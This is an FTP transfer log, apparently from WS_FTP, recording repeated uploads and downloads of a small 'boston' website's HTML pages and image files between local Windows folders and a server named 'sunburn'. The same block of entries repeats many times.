10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
